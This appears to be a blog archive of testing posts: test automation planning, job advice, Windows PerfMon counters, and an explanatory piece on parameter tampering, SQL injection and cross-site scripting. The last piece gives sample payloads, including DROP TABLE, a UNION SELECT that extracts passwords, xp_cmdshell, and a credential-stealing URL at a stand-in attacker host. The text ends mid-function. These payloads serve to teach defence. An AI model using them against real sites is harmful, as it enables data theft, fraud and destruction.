Friday

Test Automation From the Ground Up
by Vasily Shishkin and Yaron Kottler

Introduction

Test automation promises many attractive benefits, such as running multiple tests overnight at the click of a button, eliminating mindless work, increasing test coverage, and reducing the cost of testing. So the question is: how do you get started?

Deliberation of Merit

The first order of business, then, is to be sure that test automation is the right decision in your particular case. The initial automation effort can be expensive, especially if the systems have not been designed with test automation in mind (very few of them are…). Before considering automation, make sure you can positively respond to ALL of the following prerequisites:

  • The systems or applications are relatively stable with no significant redesigns expected in the foreseeable future.
  • The organization has a solid test process in place.
  • The organization has the right type of person or team in place.
  • The organization has a defined scope for an initial automation effort.
  • There is an understanding by senior management that test automation is an investment, not a short term solution.
  • There is a return on investment (ROI) analysis demonstrating at least a 50% ROI for a set period.

For an effort to be considered for test automation, it should result in a positive ROI. Since the expected lifespan of testing a system is not always known and can be hard to predict, an attempt at a comprehensive ROI calculation at an early stage will likely miscalculate the actual ROI. A short-term ROI estimate (one to three years) is a safer and easier calculation to make, typically utilizing at least some of the following factors:

  • Length of time to run a predefined test set manually.
  • Cost and availability of support resources necessary for manual test execution.
  • Number of times such test sets are expected to run during the agreed upon period.
  • Expected effort for establishing automation infrastructure (mapping objects, reusable functions…).
  • Expected effort for establishing test automation coverage utilizing above infrastructure.
  • Expected maintenance effort between each version or cycle.
  • Expected effort for executing automated tests and investigating results.
  • The value of enabling manual testers to focus mostly on testing new functionality.
  • Estimated value of shortening a test cycle by X days.
  • Estimated value of increased test coverage consistency.
  • Estimated value of knowledge retention.
  • Estimated value of executing additional test types which couldn’t be executed earlier.
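A short-term estimate built from factors like these can be sketched as a simple calculation. All of the figures below (hours, cycle counts, setup effort) are hypothetical inputs chosen for illustration, not numbers from this paper:

```python
# Hypothetical short-term ROI sketch: compares the cost of running a
# regression set manually against building and maintaining automation.
# All inputs are in person-hours and are invented for illustration.

def automation_roi(manual_cost_per_cycle, cycles, setup_cost,
                   maintenance_per_cycle, execution_per_cycle):
    """Return ROI as a fraction: (manual cost - automated cost) / automated cost."""
    manual_total = manual_cost_per_cycle * cycles
    automated_total = setup_cost + cycles * (maintenance_per_cycle +
                                             execution_per_cycle)
    return (manual_total - automated_total) / automated_total

# 40 hours of manual regression per cycle, 24 cycles over two years,
# 300 hours of infrastructure setup, 8 hours of maintenance and
# 2 hours of execution/triage per cycle.
roi = automation_roi(manual_cost_per_cycle=40, cycles=24, setup_cost=300,
                     maintenance_per_cycle=8, execution_per_cycle=2)
print(f"Estimated two-year ROI: {roi:.0%}")
```

With these made-up inputs the effort clears the 50% ROI bar mentioned above; in practice, the setup and maintenance figures are the ones most often underestimated.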

An ROI calculation is not enough, though; as indicated above, you must also ensure that you have a solid test process in place, including things like scope, strategy, test types and test levels. Simply put, automated garbage is still garbage, so if you haven’t been able to positively answer the entire automation prerequisites list above, start there. Also, keep in mind that test automation will almost never replace the first round of manual testing of new functionality; it is rather targeted at reducing the cost and risks associated with regression testing. There are cases in which a progressive automation approach enables utilizing test automation for both regression testing and testing of new functionality, but this is not recommended for organizations just getting started with test automation.

Once your foundation and preliminary ROI calculations are in place, it is time to run a test automation proof of concept (POC) project.

Test Automation Proof of Concept (POC)

Phase | Duration (small project) | Customer Involvement
Determining Scenarios and Learning the Application | 1 day | 2-3 hours
Writing Up the Test Plan | 2-3 days (depends on revisions) | 1-4 hours (depends on the customer's infrastructure)
Scripting | 1-3 weeks | ~5 hours, to answer whatever questions come up during scripting
Testing | 1-3 weeks (depends on issues found) | Best case (no problems, testers have access to server hardware): ~3 hours. Worst case (many problems, customer must monitor the server hardware): practically the same as the tester.
Final Report | 1 day (compile and present) | 1-2 hours for the presentation

A POC project should start with defining the immediate goals it should meet. While doing so, keep in mind that the POC's main purpose is not actual automation implementation; rather, it is intended to help determine what kinds of methods and resources would be required for a successful automation implementation. It is recommended that the POC project take no longer than three to four weeks. It should balance the need to discover the main automation challenges and demonstrate feasibility against the need to support relatively quick decision making. In addition to organization-specific goals, your list of POC goals should include at least some of the following:

  • Verifying test automation feasibility.
  • Exposing technical blocks and challenges.
  • Experimenting with potential solutions and workarounds.
  • Further refining cost estimates and ROI calculations.
  • Experimenting with a number of test automation tools.
  • Finalizing a tool selection or at least supporting a selection.
  • Experimenting with a number of test automation approaches (KDT, DDT, TDD, BDD, Progressive automation…) and finalizing an approach or supporting a selection.
  • Helping establish test automation context and an appropriate state of mind at your organization.
  • Defining a detailed 6 month implementation plan with 30, 60, 90 and 180 day targets.

Once your POC goals are in place, start the POC project by educating yourself on available automation approaches and their advantages. Selection of test automation approaches should include reviewing at least some of the following factors:

  • Proficiency of current personnel with each approach and technical tools associated with it.
  • Cost of training for each approach.
  • Depth of knowledge of the system under test required for each approach.
  • Number of personnel who have BOTH the skills required for the approach and the knowledge of the system under test.

When an approach is selected, next consider the tools you will need. Some of the important factors are:

  • Compatibility with the technologies present in the system under test.
  • Compatibility with the technologies planned to be utilized.
  • Compatibility with the test management systems in place.
  • Market prevalence of the tool (a wider user base facilitates finding experienced users, support groups, and other network effect factors).
  • Quality of tool vendor support.
  • Tool usability.
  • Tool features that simplify script maintenance.
  • Cost of the tool.
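One way to make such a comparison concrete is a weighted scoring matrix. The criteria weights and the 1-5 tool scores below are invented for illustration; every organization will weight these factors differently:

```python
# Hypothetical weighted scoring of one candidate tool against the
# factors above. Weights sum to 1.0; scores use an invented 1-5 scale.
CRITERIA = {
    "compatibility": 0.30,      # technologies present and planned
    "market_prevalence": 0.15,  # user base, support groups
    "vendor_support": 0.15,
    "usability": 0.15,
    "maintainability": 0.15,    # features that simplify script maintenance
    "cost": 0.10,               # higher score = cheaper
}

def weighted_score(scores):
    return sum(CRITERIA[name] * scores[name] for name in CRITERIA)

tool_a = {"compatibility": 5, "market_prevalence": 4, "vendor_support": 3,
          "usability": 4, "maintainability": 4, "cost": 2}
print(f"Tool A: {weighted_score(tool_a):.2f} / 5")
```

Scoring every shortlisted tool the same way turns the factor list into a side-by-side comparison, though the numbers should support a decision rather than make it.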

Once the tools have been chosen, the next step in a POC project is to establish a detailed Test Automation Implementation Plan. The plan should include a list of reusable business and utility functions to be tested, as well as a detailed automation breakdown. The plan should allow for the distribution of workload, estimation of the timeline, and tracking of progress.

The last topic to consider is technical guidelines, such as: object mapping structures, creation and maintenance processes, and coding conventions.

When all of the preliminary work is finished, it is time to actually implement the selected scenarios on the tools of choice. From these scenarios, a list of encountered and predicted challenges should be generated, and solutions for those challenges evaluated. If the challenges prove insurmountable, the POC's conclusion is that test automation is not feasible. Otherwise, the information gathered should enable meeting the POC goals and a more accurate recalculation of the ROI. If the revised ROI is unacceptable, another POC with an alternative approach or toolset can be performed. Alternatively, this could indicate that test automation is not a good idea for this system.

Test Automation Maintenance

If the POC is completed successfully and the decision to pursue automation is reached, automation maintenance should become the leading concern throughout your test automation implementation, as it will be the major factor in delivering a positive ROI. To ensure efficiency, it is important to build a framework that supports minimal and easy maintenance.

A good maintenance process follows this general outline:

  1. Review the list of known changes in the system and conduct a gap analysis.
  2. Create an action list of things to update such as:
    • New objects to map.
    • Existing object maps to update.
    • Object maps to remove.
    • API calls to revise.
    • Changes in system logic to accommodate.
  3. Inform the personnel of the workflow and data set changes.
  4. Upgrade scripts and infrastructure as necessary.
  5. Conduct a manual sanity test to verify that the environment is operational.
  6. Run a full suite of tests and investigate failures to understand if issues are system related or automation related.
  7. In case issues are automation related, fix the automation as needed and add such issues to future gap analysis.
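Steps 6 and 7 above amount to triaging failures into product defects and automation debt. A minimal sketch, assuming the harness tags its own errors with recognizable signatures (the signature strings and test names here are made up):

```python
# Split run failures into automation-related issues (fix the scripts,
# feed into the next gap analysis) and system-related issues (file bugs).
# The error signatures below are hypothetical harness error names.
AUTOMATION_SIGNATURES = ("ObjectNotFound", "StaleElement", "ScriptTimeout")

def triage(failures):
    """failures: iterable of (test_name, failure_reason) pairs."""
    automation, system = [], []
    for name, reason in failures:
        if any(sig in reason for sig in AUTOMATION_SIGNATURES):
            automation.append(name)
        else:
            system.append(name)
    return automation, system

auto_issues, product_bugs = triage([
    ("login_test", "ObjectNotFound: #submit-btn"),   # stale object map
    ("checkout_test", "AssertionError: total was 109.99, expected 99.99"),
])
print("fix automation:", auto_issues, "| file bugs:", product_bugs)
```

In a real suite the classification is rarely this clean, which is exactly why step 6 calls for investigating each failure rather than trusting the raw pass/fail counts.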

Once maintenance has been completed successfully, automation infrastructure and automation scenarios should be developed to support additional test coverage.

Summary

In this paper, we outline the basic steps of getting started with test automation at your organization. While each organization has different needs and technologies, we find that just about every organization can benefit from test automation, and that the above step-by-step guide provides a good framework for getting started.

Examples of good candidates

One last thing to keep in mind: the following areas typically benefit from test automation:

  • Regression tests that are repeated often – a sanity test is a good example of that.
  • Tests of stable functionality that is not expected to change much.
  • Tests that can be completed automatically with no human intervention.
  • Tests which are expensive to run manually.
  • Tests which require multiple user roles to execute.

Contact the Authors

Yaron Kottler: yaronk@qualitestgroup.com
Vasily Shishkin: vasilys@qualitestgroup.com

Thursday

Tip of the Day: Finding a Software Testing Job

There are many people who would like to get software testing jobs, but they are unsure about how to approach it. This may seem like a dream job where people get to test software, including games, as part of their work. Most people do not realize the requirements that are needed to get into software testing jobs.

First, you need to understand a little bit about how software testing works. When software is created, it goes through a product life cycle with a number of different stages, including specification, design, coding and user acceptance. Software testing requires in-depth knowledge of both coding and software design. To get the best software testing job you need strong coding skills and experience with product design.

If you don’t have much experience in these areas, then it is up to you to either attend some type of training course or learn more on your own. This means learning how to code and also how to do your own bug testing. When you have a lot of experience doing this, you will be regarded much more highly for software testing jobs than if you applied straight out of university.

Even if you have a computer science or computer engineering degree you may not have the necessary experience to apply for software testing jobs. Often in the computer industry it is very important for people to have experience. Experience often counts for much more than qualifications when it comes to hiring for a job. This is true when it comes to software testing jobs.

When you are applying for such jobs, you want to make the experience you have in this area clear to the employer so that they can get a good idea of how much you really know. When you’re applying for software testing jobs you will be going up against a number of other people who may have a lot of experience, and this can be difficult to compete against. That is why it is important to learn as much as you can in your own time and study coding and bug testing yourself.

You can find a number of software testing books and coding books available to buy that can help you learn more about this area. But when it comes down to getting software testing jobs, it is important to have hands-on experience rather than just the theory you read in a book. If you can demonstrate to an employer experience you have had in the software testing industry, or even experience you have gained on your own, this will go a long way toward getting you good software testing jobs.

Even if you are not successful applying for software testing jobs the first time, you should keep trying and keep building on your experience. When you apply for a lot of software testing jobs you will get a feel for what type of person employers are looking for, and you will be able to learn from past interviews the best way to present yourself.

Source : http://ejobhub.org/software-testing-jobs/

Tuesday

So you want to be a Software Tester?

Some people decide they want to be a ‘software tester’. Perhaps they know someone who does this, or have seen the role in real life or in a movie or in a book. Or have experienced the result of inadequate testing. Perhaps the concept just ‘sings’ to them. Some of these people have no past in software development, and some have development experience but want to move to the testing area.

And then there are people, like me, who just ‘fall into’ the role. I was doing electrical engineering and we were working on a product which required some programming. As the only person on the team who knew anything about programming, I was ‘volunteered’. And did well, so that the programming area of the business was interested in me. The job offered ‘some programming and some testing’.

Ewww, testing. But at least I would get to do some programming, so I accepted. Turned out there never was any programming, but who cares; I found out I loved testing, and just as important, was really good at it.

Let me burst your bubble here. Testing is not about finding bugs. Oh sure, you will find them, and it is just as satisfying to the tester to find bugs as it was to the developer to generate the code. Testing is about evaluating the quality of the product. If you don’t find serious bugs, the quality can be considered high, and if you do, the quality can be considered low. And you document the bugs found so that the quality can be improved to the desired level.

In fact, testing contributes to Quality Assurance, which in general has as a goal, to

1) Prevent the generation of bugs (through processes, reviews, design tools and coding tools).

2) Discover any bugs which do get in as early as possible (via reviews and testing)

The later in the process you discover a bug, the more trouble and cost to fix (or patch around) it. Thus testing and Quality Assurance are valuable positions which may be attractive to you.
There are a lot of jobs out there for testers. Experienced testers.

So how do you become a Software Tester? One presumes if you already are a tester, you have everything you need to continue testing or move to a new test position. If you are not a tester, then you need to get the credentials which can get you into that testing position.

First of all, there is Education. Learn about what testing is and various ways it can be done. Check out books, online classes, and perhaps courses at local schools. Best is if the education includes hands on experience doing actual testing, but even ‘book learning’ has its place.

Next, there is Certification. ASTQB offers an internationally recognized Software Test certification, the CTFL (Certified Tester, Foundation Level), along with more advanced certifications which are beyond the scope of this article. This is a multiple choice test which can be studied for in a classroom setting (expensive) or online. Note this by itself will not get you a job, but it should give you an advantage.

Finally, and most importantly, there is Experience. This is a hard one. You need experience to get the job, and you need the job to get experience. Classic Catch 22. So maybe you will luck out and find an entry level test position. Don’t hold your breath. You need to be proactive.

Experience testing is experience testing. Look for it everywhere. If there is a class in testing with an actual testing lab, grab it. Volunteer for extra projects through your school, or for unpaid positions (by nonprofit organizations) which involve testing. If you can get an internship, that is of enormous benefit (several of our intern testers went on to test careers with our company and others when they graduated).

If none of that is practical, then look for classes or jobs with a lot of programming. Any time you program, you need to do testing. Treat the testing part of this activity as the ‘most important’ part. Do it and document it in a professional manner; these may provide evidence of your skills to potential employers. Plus, if you get an entry level programming job with a company worth staying with, you might be able to ‘move’ into the testing position you desire.

Finally, do testing as a ‘hobby’. There are not many computerized devices, web sites or software programs out there which have ‘no’ bugs. So, test them. Record the bugs in a professional manner. You may even be able to submit the bug reports to the company which produced them. And there are ‘cloud testing’ organizations out there which accept testers without experience to do real testing, and pay for it (usually per valid bug found).

So you can see that, in today’s market at least, getting to be a Software Tester is not a straight and broad road. But there are paths to that goal, even if they may be narrow and twisty.


Saturday

Windows Perfmon: The Top Ten Counters
One of the things I love about Windows is Performance Monitor a/k/a PerfMon. It's an amazing tool that goes far too often unused - and when it does get used, it is often misinterpreted. So today I'm going to take you on the nickel tour through PerfMon, and the ten counters most valuable to determining overall system health and activity.

To open PerfMon, just go to the Start Menu, choose Run and type perfmon.
Bottleneck analysis

The most common use of PerfMon is to answer the burning question: why is my system running slow?

With the five performance counters listed below, you can quickly get an overall impression of how healthy a system is - and where the problems are, if they exist. The idea here is to pick counters that will be at low or zero values when the system is healthy, and at high values when something is overloaded. A 'perfectly healthy' system would show all counters flatlined at zero. (Perfection is unattainable, so you'll probably never see all of these counters flatlined at zero in real life. The CPU will almost always have a few items in queue.)

Processor utilization
System\Processor Queue Length - number of threads queued and waiting for time on the CPU. Divide this by the number of CPUs in the system. If the answer is less than 10, the system is most likely running well.
Memory utilization
Memory\Pages Input/Sec - The best indicator of whether you are memory-bound, this counter shows the rate at which pages are read from disk to resolve hard page faults. In other words, the number of times the system was forced to retrieve something from disk that should have been in RAM. Occasional spikes are fine, but this should generally flatline at zero.
Disk Utilization
PhysicalDisk\Current Disk Queue Length\driveletter - this is probably the single most valuable counter to watch. It shows how many read or write requests are waiting to execute to the disk. For single disks, it should idle at 2-3 or lower, with occasional spikes being okay. For RAID arrays, divide by the number of active spindles in the array; again try for 2-3 or lower. Because a shortage of RAM will tend to beat on the disk, look closely at the Memory\Pages Input/Sec counter if disk queue lengths are high.
Network Utilization
Network Interface\Output Queue Length\nic name - is the number of packets in queue waiting to be sent. If there is a sustained average of more than two packets in queue, you should be looking to resolve a network bottleneck.
Network Interface\Packets Received Errors\nic name - packet errors that kept the TCP/IP stack from delivering packets to higher layers. This value should stay low.
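The rules of thumb above can be collected into a quick health check. This is an illustrative sketch only: the counter values would come from a PerfMon log export, and the thresholds (especially the paging cutoff) are judgment calls taken from the text, not hard limits:

```python
# Apply the article's bottleneck rules of thumb to a set of counter
# readings. Thresholds: processor queue < 10 per CPU, Pages Input/sec
# near zero (a small allowance for spikes is assumed here), disk queue
# of 2-3 or lower per spindle, output queue of 2 packets or fewer.

def bottlenecks(proc_queue, cpus, pages_in_per_sec,
                disk_queue, spindles, net_out_queue):
    problems = []
    if proc_queue / cpus >= 10:
        problems.append("cpu")
    if pages_in_per_sec > 5:        # sustained hard page faults
        problems.append("memory")
    if disk_queue / spindles > 3:
        problems.append("disk")
    if net_out_queue > 2:
        problems.append("network")
    return problems

# A lightly loaded system like the screenshot below: everything near zero.
print(bottlenecks(proc_queue=4, cpus=2, pages_in_per_sec=0,
                  disk_queue=1, spindles=1, net_out_queue=0))
```

An empty result means no subsystem is flagged; any entry in the list names the subsystem worth drilling into with more detailed counters.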
To highlight a particular counter's line on the graph, select that counter in the lower pane. Then click the lightbulb icon on the toolbar above the graph. This will make the line for that counter turn thick and white (or black on some systems - I never found out why this changes).

Pay close attention to the scale column! Perfmon attempts to automatically pick a scale that will magnify or reduce the counter enough to produce a meaningful line on the graph ... but it doesn't always get it right. As an example, Perfmon often chooses to multiply Disk Queue Length by 100. So, you might think the disk queue length is sustained at 10 (bad!) when in fact it's really at 1 (good). If you're not sure, highlight the counter in the lower pane, and watch the Last and Average values just below the graph. In the screenshot below, I modified all of the counters to a scale value of 1.0, then changed the graph's vertical axis to go from 0-10.

To change graph properties (like scale and vertical axis as discussed above), rightclick the graph and choose Properties. There are a number of things to customize here ... fiddle with it until you have a graph that looks good to you.

To get a more detailed explanation of any counter, rightclick anywhere in the perfmon graph and choose Add Counters. Select the counter and object that you are curious about, and click the Explain button.

This screenshot shows a very lightly-loaded XP system, with the Memory\Pages Input/Sec counter highlighted:




All we see here is the Processor Queue Length hovering between 1 and 4, and two short spikes of Pages Input/Sec. All other counters are flatlined at zero, which is easy to check by highlighting each of them and watching the values bar underneath the graph. This is a happy system - no problems here!

But if we saw any of the above counters averaging more than 2-4 for long periods of time (except Processor Queue Length: don't worry unless it's above 10 for long lengths of time), we'd be able to conclude that there was a problem with that subsystem. We could then drill down using more detailed counters to see exactly what was causing that subsystem to be overloaded. More detailed analysis is beyond the scope of this article, but if there's enough interest I could do a second article on that. Leave a comment if you're interested!

General activity counters

Well, the system is healthy - and that's good ... but how hard is it working? Is the processor workin' hard, or hardly workin'? How much RAM is in use, how many bytes are being written to or read from the disk or network? The following counters are a good overview of general activity of the system.
Processor utilization
Processor\% Processor Time\_Total - just a handy idea of how 'loaded' the CPU is at any given time. Don't confuse 100% processor utilization with a slow system though - processor queue length, mentioned above, is much better at determining this.
Memory utilization
Process\Working Set\_Total (or per specific process) - this basically shows how much memory is in the working set, or currently allocated RAM.
Memory\Available MBytes - amount of free RAM available to be used by new processes.
Disk Utilization
PhysicalDisk\Bytes/sec\_Total (or per process) - shows the number of bytes per second being written to or read from the disk.
Network Utilization
Network Interface\Bytes Total/Sec\nic name - Measures the number of bytes sent or received.
In the graph below, I added these five counters to my existing 'bottlenecks' graph, and changed the vertical axis to go from 0-100. I highlighted the Working Set\_Total counter, which is currently at about 123 megabytes for the system. Notice how it shows a thick line at the top of the graph - you could assume that it was pegged at 100, if you didn't read the values bar (the raw value, roughly 123 million bytes, divided by a million is approximately 123 megabytes).



And ... that's all for now. Hopefully this quick show-and-tell has given you enough information to put PerfMon to better use.

Wednesday

Parameter Tampering

Parameter tampering is a simple attack targeting the application business logic. This attack takes advantage of the fact that many programmers rely on hidden or fixed fields (such as a hidden tag in a form or a parameter in a URL) as the only security measure for certain operations. Attackers can easily modify these parameters to bypass the security mechanisms that rely on them.

Detailed Description

The basic role of Web servers is to serve files. During a Web session, parameters are exchanged between the Web browser and the Web application in order to maintain information about the client's session, eliminating the need to maintain a complex database on the server side. Parameters are passed through the use of URL query strings, form fields and cookies.

A classic example of parameter tampering is changing parameters in form fields. When a user makes selections on an HTML page, they are usually stored as form field values and sent to the Web application as an HTTP request. These values can be pre-selected (combo box, check box, radio button, etc.), free text or hidden. All of these values can be manipulated by an attacker. In most cases this is as simple as saving the page, editing the HTML and reloading the page in the Web browser.

Hidden fields are parameters invisible to the end user, normally used to provide status information to the Web application. For example, consider a product order form that includes the following hidden field:
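A hidden price field of the kind described might look like the following (the field names, values and form action here are illustrative, not taken from the original example):

```html
<!-- Illustrative only: a hidden unit-price field that an attacker can
     edit by saving the page, changing the value and reloading it -->
<form method="POST" action="/order.asp">
  Quantity: <input type="text" name="quantity" value="1">
  <input type="hidden" name="unitprice" value="99.90">
  <input type="submit" value="Order">
</form>
```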

Modifying this hidden field value will cause the Web application to charge according to the new amount.

Combo boxes, check boxes and radio buttons are examples of pre-selected parameters used to transfer information between different pages, while allowing the user to select one of several predefined values. In a parameter tampering attack, an attacker may manipulate these values. For example, consider a form that includes the following combo box:


(Form fields: a Source Account combo box offering two predefined accounts, an Amount field, and a Destination Account field.)
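The form's markup might look something like the following (account numbers, field names and the form action are illustrative):

```html
<!-- Illustrative only: the attacker adds a third <option> to a saved
     copy of the page to act on an account that was never offered -->
<form method="POST" action="/transfer.asp">
  Source Account:
  <select name="sourceaccount">
    <option value="12345">12345</option>
    <option value="67891">67891</option>
  </select>
  Amount: <input type="text" name="amount">
  Destination Account: <input type="text" name="destination">
  <input type="submit" value="Transfer">
</form>
```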


An attacker may bypass the restriction to the two listed accounts by adding another option to the HTML page source code. The modified combo box is displayed in the Web browser and the attacker can choose the new account.

HTML forms submit their results using one of two methods: GET or POST. If the method is GET, all form parameters and their values will appear in the query string of the next URL the user sees. An attacker may tamper with this query string. For example, consider a Web page that allows an authenticated user to select one of his/her accounts from a combo box and debit the account with a fixed unit amount. When the submit button is pressed in the Web browser, the following URL is requested:

http://www.mydomain.com/example.asp?accountnumber=12345&debitamount=1

An attacker may change the URL parameters (accountnumber and debitamount) in order to debit another account, or even rename debitamount to creditamount so that the account is credited instead:

http://www.mydomain.com/example.asp?accountnumber=67891&creditamount=9999

There are other URL parameters that an attacker can modify, including attribute parameters and internal modules. Attribute parameters are unique parameters that characterize the behavior of the uploading page. For example, consider a content-sharing Web application that enables the content creator to modify content, while other users can only view content. The Web server checks whether the user that is accessing an entry is the author or not (usually by cookie). An ordinary user will request the following link:

http://www.mydomain.com/getpage.asp?id=77492&mode=readonly

An attacker can modify the mode parameter to readwrite in order to gain authoring permissions for the content.

SQL Injection

SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact that programmers often chain together SQL commands with user-provided parameters, and can therefore embed SQL commands inside these parameters. The result is that the attacker can execute arbitrary SQL queries and/or commands on the backend database server through the Web application.

Details

Databases are fundamental components of Web applications. Databases enable Web applications to store data, preferences and content elements. Using SQL, Web applications interact with databases to dynamically build customized data views for each user. A common example is a Web application that manages products. In one of the Web application's dynamic pages (such as ASP), users are able to enter a product identifier and view the product name and description. The request sent to the database to retrieve the product's name and description is implemented by the following SQL statement.

SELECT ProductName, ProductDescription FROM Products WHERE ProductNumber = <product number>

Typically, Web applications use string queries, where the string contains both the query itself and its parameters. The string is built using server-side script languages such as ASP, JSP and CGI, and is then sent to the database server as a single SQL statement. The following example demonstrates an ASP code that generates a SQL query.

sql_query = "SELECT ProductName, ProductDescription FROM Products WHERE ProductNumber = " & Request.QueryString("ProductID")

The call Request.QueryString("ProductID") extracts the value of the Web form variable ProductID so that it can be appended as the SELECT condition.

When a user enters the following URL:

http://www.mydomain.com/products/products.asp?productid=123 

The corresponding SQL query is executed:

SELECT ProductName, ProductDescription FROM Products WHERE ProductNumber = 123

An attacker may abuse the fact that the ProductID parameter is passed to the database without sufficient validation. The attacker can manipulate the parameter's value to build malicious SQL statements. For example, setting the value "123 OR 1=1" to the ProductID variable results in the following URL:

http://www.mydomain.com/products/products.asp?productid=123 or 1=1 

The corresponding SQL Statement is:

SELECT ProductName, ProductDescription FROM Products WHERE ProductNumber = 123 OR 1=1

This condition is always true, so all ProductName and ProductDescription pairs are returned. The attacker can manipulate the application even further by inserting malicious commands. For example, an attacker can request the following URL:

http://www.mydomain.com/products/products.asp?productid=123; DROP TABLE Products

In this example the semicolon is used to pass the database server multiple statements in a single execution. The second statement is "DROP TABLE Products" which causes SQL Server to delete the entire Products table.

An attacker may use SQL injection to retrieve data from other tables as well. This can be done using the SQL UNION SELECT statement. The UNION SELECT statement allows the chaining of two separate SQL SELECT queries that have nothing in common. For example, consider the following SQL query:

SELECT ProductName, ProductDescription FROM Products WHERE ProductNumber = '123' UNION SELECT Username, Password FROM Users;

The result of this query is a table with two columns, containing the combined rows of the first and second queries. An attacker may use this type of SQL injection by requesting the following URL:

http://www.mydomain.com/products/products.asp?productid=123 UNION SELECT Username, Password FROM Users 
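The UNION trick can be demonstrated with Python's built-in sqlite3 module (in-memory tables and their contents are illustrative):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE Products (ProductNumber INTEGER, ProductName TEXT,
                           ProductDescription TEXT);
    CREATE TABLE Users (Username TEXT, Password TEXT);
    INSERT INTO Products VALUES (123, 'Widget', 'A widget');
    INSERT INTO Users VALUES ('alice', 's3cret');
""")

def lookup(product_id: str):
    # The same vulnerable concatenation as in the product lookup.
    query = ("SELECT ProductName, ProductDescription FROM Products "
             "WHERE ProductNumber = " + product_id)
    return conn.execute(query).fetchall()

# The injected UNION must supply the same number of columns (two here),
# so Username and Password line up with ProductName and ProductDescription.
rows = lookup("123 UNION SELECT Username, Password FROM Users")
print(rows)
```

The result set now mixes product rows with username/password pairs, which the application dutifully renders for the attacker.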

The security model used by many Web applications assumes that an SQL query is a trusted command. This enables attackers to exploit SQL queries to circumvent access controls, authentication and authorization checks. In some instances, SQL queries may allow access to host operating system level commands. This can be done using stored procedures. Stored procedures are SQL procedures usually bundled with the database server. For example, the extended stored procedure xp_cmdshell executes operating system commands in the context of a Microsoft SQL Server. Using the same example, the attacker can set the value of ProductID to be "123;EXEC master..xp_cmdshell dir--", which returns the list of files in the current directory of the SQL Server process.

Prevention

The most common way of detecting SQL injection attacks is by looking for SQL signatures in the incoming HTTP stream, for example, looking for SQL commands such as UNION, SELECT or xp_. The problem with this approach is the very high rate of false positives: most SQL commands are legitimate words that could normally appear in the incoming HTTP stream. This will eventually cause the user to either disable or ignore any SQL alert reported. To overcome this problem to some extent, the product must learn where it should and shouldn't expect SQL signatures to appear. The ability to discern parameter values within the entire HTTP request, and the ability to handle various encoding scenarios, are a must in this case.
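A minimal sketch of this kind of detection, using Python's standard URL parsing and a hypothetical signature list (a real product would use far richer rules and handle many more encodings):

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Hypothetical signature list, for illustration only.
SIGNATURES = re.compile(r"\b(union|select|drop)\b|xp_", re.IGNORECASE)

def suspicious_params(url: str):
    # Scan only decoded parameter values, not the raw HTTP stream,
    # to cut down on false positives.
    pairs = parse_qsl(urlsplit(url).query)  # parse_qsl percent-decodes values
    return [name for name, value in pairs if SIGNATURES.search(value)]

print(suspicious_params(
    "http://www.mydomain.com/products/products.asp?productid=123"))
print(suspicious_params(
    "http://www.mydomain.com/products/products.asp"
    "?productid=123 UNION SELECT Username, Password FROM Users"))
```

Even restricted to parameter values, word signatures like SELECT still fire on legitimate text, which is why the profiling approach described next goes further.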

Imperva SecureSphere does much more than that. It observes the SQL communication and builds a profile consisting of all allowed SQL queries. Whenever an SQL injection attack occurs, SecureSphere can detect the unauthorized query sent to the database. SecureSphere can also correlate anomalies on the SQL stream with anomalies on the HTTP stream to accurately detect SQL injection attacks.

Another important capability that SecureSphere introduces is the ability to monitor a user's activity over time and to correlate various anomalies generated by the same user. For example, the occurrence of a certain SQL signature in a parameter value might not be enough to raise an SQL injection alert, but the same signature in correlation with error responses, abnormal parameter sizes, or other signatures may indicate an attempted SQL injection attack.

Cross-Site Scripting (XSS or CSS)

Cross-site scripting ('XSS' or 'CSS') is an attack that takes advantage of a Web site vulnerability in which the site displays content that includes unsanitized user-provided data. For example, an attacker might place a hyperlink with an embedded malicious script into an online discussion forum. The purpose of the malicious script is to attack other forum users who happen to select the hyperlink; for example, it could copy user cookies and then send those cookies to the attacker.

Details

Web sites today are more complex than ever and often contain dynamic content to enhance the user experience. Dynamic content is achieved through the use of Web applications that can deliver content to a user according to their settings and needs.

While performing different user customizations and tasks, many sites take input parameters from a user and display them back to the user, usually as a response to the same page request. Examples of such behavior include the following.

  • Search engines which present the search term in the title ("Search Results for: search_term")
  • Error messages which contain the erroneous parameter
  • Personalized responses ("Hello, username")

Cross-site scripting attacks occur when an attacker takes advantage of such applications and creates a request with malicious data (such as a script) that is later presented to the user requesting it. The malicious content is usually embedded into a hyperlink, positioned so that the user will come across it on a Web site, a message board, in an email, or in an instant message. If the user follows the link, the malicious data is sent to the Web application, which in turn builds an output page for the user containing the malicious content. The user, however, is normally unaware of the attack and assumes the data originates from the Web server itself, making it appear to be valid content from the Web site.

For example, consider a Web application that requires users to log in to visit an authorized area. When users wish to view the authorized area, they provide their username and password, which are then checked against a user database table. Assume that this login system contains two pages: Login.asp, which presents a form for users to enter their username and password; and CheckCredentials.asp, which checks whether the supplied username/password pair is valid. If it is invalid, CheckCredentials.asp uses (for example) a Response.Redirect to send the user back to Login.asp, including an error message in the query string. The Response.Redirect call will be something like the following.

Response.Redirect("Login.asp?ErrorMessage=Invalid+username+or+password") 

Then, in Login.asp, the error message query string value is written directly into the generated page.

Using this technique, when users attempt to log in with an invalid username or password, they are returned to Login.asp and a short message indicates that their username/password was invalid. By changing the ErrorMessage value, an attacker can embed malicious JavaScript code into the generated page, causing the script to execute on the computer of the user viewing the site. For example, assume that Login.asp is called using the following URL.

http://www.somesite.com/Login.asp?ErrorMessage=

As in the code for Login.asp, the ErrorMessage query string value is emitted verbatim into the generated HTML page.

The attacker embeds HTML code into this page in such a way that when users browse it, their supplied username and password are submitted to the following page.

http://www.hax0r.com/stealPassword.asp 

An attacker can send a link to the contrived page via an email message or a link on some message board, hoping that a user will click the link and attempt to log in. Of course, by attempting to log in, the user submits their username and password to the attacker's site.
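The difference between the vulnerable page and a sanitized one can be sketched in Python with the standard html module (the page builder and payload here are illustrative, not the original Login.asp code):

```python
import html

def login_page(error_message: str) -> str:
    # Vulnerable: reflects the raw query-string value into the page.
    return "<html><body><p>" + error_message + "</p></body></html>"

def safe_login_page(error_message: str) -> str:
    # Escaping the value before it reaches the page renders any
    # embedded markup inert.
    return "<html><body><p>" + html.escape(error_message) + "</p></body></html>"

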